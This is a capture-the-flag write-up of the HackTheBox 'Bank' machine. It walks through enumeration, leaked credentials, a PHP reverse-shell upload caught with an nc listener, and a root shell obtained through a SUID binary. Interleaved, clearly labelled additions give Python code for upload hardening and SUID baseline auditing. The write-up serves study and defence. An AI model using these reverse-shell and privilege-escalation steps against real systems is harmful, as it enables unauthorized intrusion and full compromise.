Łukasz Woźniak

HackTheBox - Bank

Bank is a relatively simple machine; however, proper web enumeration is key to finding the data needed for entry. There is also an unintended entry method, which many users find before the correct data is located.


Reconnaissance and Enumeration


I started with a typical nmap scan: -sC for default scripts, -sV for service versions, -O for OS detection and -T5 to speed up the scan.

┌──(vq4s㉿kali)-[~/Downloads]
└─$ nmap -sC -sV -O -T5 bank.htb
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-02 23:58 CEST
Nmap scan report for bank.htb (10.10.10.29)
Host is up (0.032s latency).
rDNS record for 10.10.10.29: Bank.htb
Not shown: 997 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 08:ee:d0:30:d5:45:e4:59:db:4d:54:a8:dc:5c:ef:15 (DSA)
|   2048 b8:e0:15:48:2d:0d:f0:f1:73:33:b7:81:64:08:4a:91 (RSA)
|   256 a0:4c:94:d1:7b:6e:a8:fd:07:fe:11:eb:88:d5:16:65 (ECDSA)
|_  256 2d:79:44:30:c8:bb:5e:8f:07:cf:5b:72:ef:a1:6d:67 (ED25519)
53/tcp open  domain  ISC BIND 9.9.5-3ubuntu0.14 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.9.5-3ubuntu0.14-Ubuntu
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
| http-title: HTB Bank - Login
|_Requested resource was login.php
Aggressive OS guesses: Linux 3.10 - 4.11 (95%), Linux 3.13 (95%), Linux 3.13 or 4.2 (95%), Linux 4.2 (95%), Linux 4.4 (95%), Linux 3.16 (94%), Linux 3.16 - 4.6 (94%), Linux 3.12 (93%), Linux 3.18 (93%), Linux 3.2 - 4.9 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.58 seconds

Standard login page; I didn't find anything useful in the page source.

I used Gobuster to enumerate directories on the web server.

┌──(vq4s㉿kali)-[~/Downloads]
└─$ gobuster dir -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://bank.htb          
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://bank.htb
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/uploads              (Status: 301) [Size: 305] [--> http://bank.htb/uploads/]
/assets               (Status: 301) [Size: 304] [--> http://bank.htb/assets/]
/inc                  (Status: 301) [Size: 301] [--> http://bank.htb/inc/]
/server-status        (Status: 403) [Size: 288]
/balance-transfer     (Status: 301) [Size: 314] [--> http://bank.htb/balance-transfer/]
Progress: 220559 / 220560 (100.00%)
===============================================================
Finished
===============================================================

(Screenshots of the /uploads, /assets and /inc listings.)

These directories contain standard PHP, JavaScript, and theme files. The /balance-transfer/ path was more interesting:

In /balance-transfer, I found a large list of files. Most looked similar, but one file was noticeably smaller in size.

It contained a failed-encryption error message that exposed plaintext credentials, which I used to log in successfully.

Logged in as Christos Christopoulos, I didn't find anything interesting in the page source, so I decided to check the support page.

Exploitation


On the support page, users could attach image files to tickets. While inspecting the source code, I found an HTML comment mentioning support for the .htb file extension, a valuable hint that files with this extension might be accepted even if they weren't images.

I created a PHP reverse shell (PentestMonkey) and uploaded it with a .htb extension; the upload was accepted. I set up a listener and triggered the shell using the "Click here" button:

┌──(vq4s㉿kali)-[~/Downloads]
└─$ nc -lvnp 4242
listening on [any] 4242 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.29] 41136
Linux bank 4.4.0-79-generic #100~14.04.1-Ubuntu SMP Fri May 19 18:37:52 UTC 2017 i686 athlon i686 GNU/Linux
 01:40:30 up 43 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
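As an added example (not part of this writeup or of the Bank application's own code), here is how the support form's attachment check could be hardened in Python: the extension must be on an image allowlist, the file bytes must match that image type, and the stored name is chosen server-side so the client-supplied name never decides what the web server executes. The function names and sample inputs are assumptions.

```python
import os
import re
import secrets

# Extensions the support form is meant to accept: image attachments only.
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif"}

# Leading magic bytes for each allowed type; content must match the extension.
MAGIC = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}

SAFE_NAME = re.compile(r"^[A-Za-z0-9_.-]+$")


class UploadRejected(ValueError):
    pass


def validate_upload(filename: str, content: bytes) -> str:
    """Return a server-chosen storage name, or raise UploadRejected.

    On this box the extension alone decided what Apache executed, so a
    '.htb' upload ran as PHP. Here the final extension must be an image
    type, the bytes must look like that image type, and the name on disk
    is random so nothing the client sent reaches the filesystem.
    """
    base = os.path.basename(filename)            # drop any path components
    if not SAFE_NAME.match(base) or base.startswith("."):
        raise UploadRejected("unsafe filename")
    # Only the last extension counts: 'shell.png.htb' has extension 'htb'.
    ext = base.rsplit(".", 1)[-1].lower() if "." in base else ""
    if ext not in ALLOWED_EXTENSIONS:
        raise UploadRejected(f"extension .{ext or '(none)'} not allowed")
    if not content.startswith(MAGIC[ext]):
        raise UploadRejected("content does not match declared image type")
    # Defence in depth against image/PHP polyglots (heuristic, not a parser).
    if b"<?php" in content or b"<?=" in content:
        raise UploadRejected("embedded PHP tag in image data")
    return f"{secrets.token_hex(16)}.{ext}"


def is_accepted(filename: str, content: bytes) -> bool:
    """Boolean wrapper around validate_upload for callers that only need a verdict."""
    try:
        validate_upload(filename, content)
        return True
    except UploadRejected:
        return False
```

Even with this check, uploads belong outside the document root or in a directory where script execution is disabled, because on this box the handler mapping, not the file name, decided what got executed.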

Logged in as www-data, I spawned an interactive shell with bash -i, then navigated to the home directory to retrieve the user flag:

$ bash -i
bash: cannot set terminal process group (1072): Inappropriate ioctl for device
bash: no job control in this shell
www-data@bank:/$ ls -la /home
ls -la /home
total 12
drwxr-xr-x  3 root  root  4096 Jan 11  2021 .
drwxr-xr-x 22 root  root  4096 Jan 11  2021 ..
drwxr-xr-x  3 chris chris 4096 Jan 11  2021 chris
www-data@bank:/$ wc /home/chris/user.txt
wc /home/chris/user.txt
 1  1 33 /home/chris/user.txt

Privilege Escalation


I first checked for sudo permissions.

www-data@bank:/$ sudo -l
sudo -l
sudo: no tty present and no askpass program specified

No sudo permissions, so I checked for SUID binaries. Any of the following commands will find them:

find / -user root -perm -4000 -print 2>/dev/null
find / -type f -perm -04000 -ls 2>/dev/null
find / -type f -perm -u=s 2>/dev/null | xargs ls -l
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
www-data@bank:/$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/var/htb/bin/emergency
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/bin/at
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/traceroute6.iputils
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/mtr
/usr/sbin/uuidd
/usr/sbin/pppd
/bin/ping
/bin/ping6
/bin/su
/bin/fusermount
/bin/mount
/bin/umount
www-data@bank:/$ cd /var/htb/bin
cd /var/htb/bin
www-data@bank:/var/htb/bin$ ls -la 
ls -la 
total 120
drwxr-xr-x 2 root root   4096 Jan 11  2021 .
drwxr-xr-x 3 root root   4096 Jan 11  2021 ..
-rwsr-xr-x 1 root root 112204 Jun 14  2017 emergency
www-data@bank:/var/htb/bin$ ./emergency
./emergency
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=0(root),33(www-data)                                                                                                                   

The emergency binary was owned by root and had the SUID bit set. Executing it dropped me into a shell with euid=0(root), which allowed me to read the final flag.

wc /root/root.txt
 1  1 33 /root/root.txt
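Added example, not from the writeup: a Python triage that does what the find one-liners above do and then compares the result against a recorded baseline, so a setuid root file outside the usual system directories, like /var/htb/bin/emergency here, stands out immediately. The sample inventory is a constructed subset of the listing above and the baseline is an assumption.

```python
import os
import stat

# Directories where a stock Ubuntu install keeps its legitimate setuid
# helpers; a setuid file anywhere else (here /var/htb/bin) is the thing to flag.
STANDARD_PREFIXES = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/", "/usr/lib/")

# Constructed sample: a subset of the find output as the live inventory, plus
# an assumed baseline recorded at build time (without 'at' and 'emergency').
SAMPLE_INVENTORY = [
    "/bin/mount", "/bin/ping", "/bin/su", "/usr/bin/at", "/usr/bin/passwd",
    "/usr/bin/pkexec", "/usr/bin/sudo", "/usr/lib/openssh/ssh-keysign",
    "/var/htb/bin/emergency",
]
SAMPLE_BASELINE = [p for p in SAMPLE_INVENTORY
                   if p not in ("/usr/bin/at", "/var/htb/bin/emergency")]


def find_suid(root="/"):
    """Walk the filesystem (like 'find / -perm -u=s -type f') and return
    regular files with the setuid bit set; unreadable directories are skipped."""
    found = []
    for dirpath, _dirs, files in os.walk(root, onerror=lambda _e: None):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append(path)
    return sorted(found)


def triage(inventory, baseline):
    """Classify each setuid file: already in the baseline, new but under a
    standard system prefix, or new and off-path (the highest-priority bucket)."""
    known = set(baseline)
    report = {"baseline": [], "new_standard_path": [], "off_path": []}
    for path in sorted(set(inventory)):
        if path in known:
            report["baseline"].append(path)
        elif path.startswith(STANDARD_PREFIXES):
            report["new_standard_path"].append(path)
        else:
            report["off_path"].append(path)
    return report


if __name__ == "__main__":
    for path in triage(SAMPLE_INVENTORY, SAMPLE_BASELINE)["off_path"]:
        print("unexpected setuid file:", path)
```

On a live host, replace SAMPLE_INVENTORY with find_suid("/") and keep the baseline in version control so the diff is reviewable over time.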